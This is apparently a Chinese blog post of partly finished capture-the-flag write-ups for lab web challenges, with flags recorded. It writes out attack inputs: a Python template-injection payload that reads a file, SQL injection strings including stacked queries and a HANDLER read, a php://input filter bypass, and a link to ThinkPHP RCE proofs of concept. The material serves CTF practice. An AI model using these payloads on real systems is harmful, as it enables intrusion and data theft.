攻防世界 高手进阶区-WEB---没做完,先不用看了

001 baby_web

题目描述:想想初始页面是哪个
flag{very_baby_web}
在这里插入图片描述

  • 访问题目场景地址
  • 网站页面为1.php

在这里插入图片描述

  • 访问index.php

index在互联网上表示网站的默认主页。
一般为 index.html index.htm index.asp index.php

在这里插入图片描述

002 ics-06

题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。
cyberpeace{0b182d184cb38edde89558d6641d8495}

  • 页面只有报表中心可以点击

在这里插入图片描述
在这里插入图片描述

  • 抓包
  • 爆破id
    在这里插入图片描述

003 Training-WWW-Robots

cyberpeace{06f2f9e54285abb764f13a78ca8ecc39}
在这里插入图片描述

  • 访问在线网站

在这里插入图片描述

  • 在线翻译一下

在这个小小的培训挑战中,您将了解Robots_Exclusion_Standard。
网络爬虫使用robots.txt文件检查是否允许他们抓取和索引您的网站或只允许部分内容。
有时,这些文件会暴露目录结构,而不是保护内容不被抓取。 好好享受吧!

在这里插入图片描述
在这里插入图片描述

004 PHP2

cyberpeace{23f0d251c1af2f4b234bc4d8002abc94}

在这里插入图片描述

  • 查看页面源码和HTTP报文都没得到用的信息。尝试访问index.php,网站也没反应。

phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。
因为用户无法直接通过Web浏览器“看到”php文件的内容,所以需要用phps文件代替。

在这里插入图片描述

005 Web_python_template_injection

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

在这里插入图片描述

  • 题目为Python模块注入
  • 执行命令 …/{{7+7}}

在这里插入图片描述

  • 说明服务器执行了{{}}里面这一段代码

  • 读取flag

%7B%7B''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()%7D%7D

在这里插入图片描述

006 Web_php_unserialize

在这里插入图片描述

007 php_rce

flag{thinkphp5_rce}

在这里插入图片描述

  • 题目php_rce
  • RCE:远程代码执行漏洞
  • ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞。攻击者通过该漏洞可能完全控制Web服务器。

thinkphp漏洞
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

在这里插入图片描述

在这里插入图片描述

008 Web_php_include

在这里插入图片描述

其中含有两个参数:

hello参数中的内容会被输出到页面

page参数中的内容则会被进行文件包含,但是会对php://进行过滤

两个函数:

strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。
string:必需。规定被搜索的字符串。
search:必需。规定要搜索的字符串。如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符。
before_search:可选。一个默认值为 “false” 的布尔值。如果设置为 “true”,它将返回 search 参数第一次出现之前的字符串部分。

str_replace(find,replace,string,count):这个函数是用来替换字符串的
find:要查的字符串。
string:原始字符串

绕过方式:

使用大小写绕过的方式:PhP://
这里我们使用伪协议phP://input

php://input是个可以访问请求的原始数据的只读流。可以读取post提交的数据
我们在post提交的内容中写入命令执行(反引号)的php代码:

009 supersqli

在这里插入图片描述
在这里插入图片描述
字段判断
查询

1’ order by 1 #

1’ order by 2 #

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
说明SQL语句的字段为2

爆表
联合查询
试着基础的查询

-1’ union select 1,databases #

在这里插入图片描述
字符串匹配函数
说明过滤了括号中的关键字,包括我们要用的selecte

在这里插入图片描述
先看看supersqli这个数据库

-1’;use supersqli;show tables;#

在这里插入图片描述
查看表

-1’;use supersqli;show columns from 1919810931114514;#

当纯数字字符串是表名的时候需要加反引号`

在这里插入图片描述
字段查询
handler查询法
https://www.jb51.net/article/88732.htm

查询

-1’;use supersqli;handler 1919810931114514 open as p;handler p read first;#

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值